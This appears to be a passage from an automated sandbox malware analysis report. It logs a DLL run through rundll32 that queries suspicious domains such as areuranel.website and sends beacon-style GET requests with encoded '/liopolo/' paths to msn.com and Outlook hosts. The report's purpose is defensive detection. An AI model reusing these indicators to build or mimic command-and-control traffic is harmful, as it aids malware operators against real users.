                      Source: Binary string: combase.pdbDv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.218.66 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.137.210 187
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.153.146 40.97.153.146
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: VI1PR0102CU003.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COMX-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.comX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1X-FEServer: VI1PR0102CA0087X-Powered-By: ASP.NETX-FEServer: AS8PR04CA0081Date: Mon, 11 Oct 2021 22:38:46 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 463ae588-6705-a5a4-dc70-c20dde540b89Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: HE1PR0202CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COMX-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1X-FEServer: HE1PR0202CA0016X-Powered-By: ASP.NETX-FEServer: AM6P194CA0062Date: Mon, 11 Oct 2021 22:38:53 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: bd6df30b-3506-0654-39aa-09111fc341ceStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAlt-Svc: h3=":443",h3-29=":443"X-CalculatedFETarget: VI1PR07CU008.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COMX-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1X-FEServer: VI1PR07CA0252X-Powered-By: ASP.NETX-FEServer: AM5PR0101CA0012Date: Mon, 11 Oct 2021 22:40:08 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.899844356.00000000045A7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.940321648.0000000005220000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpString found in binary or memory: https://breuranel.website/liopolo/q3ygJYAFVGZ_2F/lrVZdSxP5qWZx0IQW_2Fv/fatA_2F92zFSM6Wv/k_2BiVYapNB7
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991885&rver
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991891&rver
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991967&rver
                      Source: rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633991974&rver
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://msn.com/
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://msn.com/D
                      Source: loaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmpString found in binary or memory: https://msn.com/f
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abY
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/2H
                      Source: loaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/9H
                      Source: loaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Bo
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNus
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmpString found in binary or memory: https://watson.tel
                      Source: rundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gi
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpString found in binary or memory: https://wwtlook.office365.com/
                      Source: loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2
                      Source: loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2
                      Source: rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18q
                      Source: rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqe
                      Source: loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0
                      Source: loaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXa
                      Source: loaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
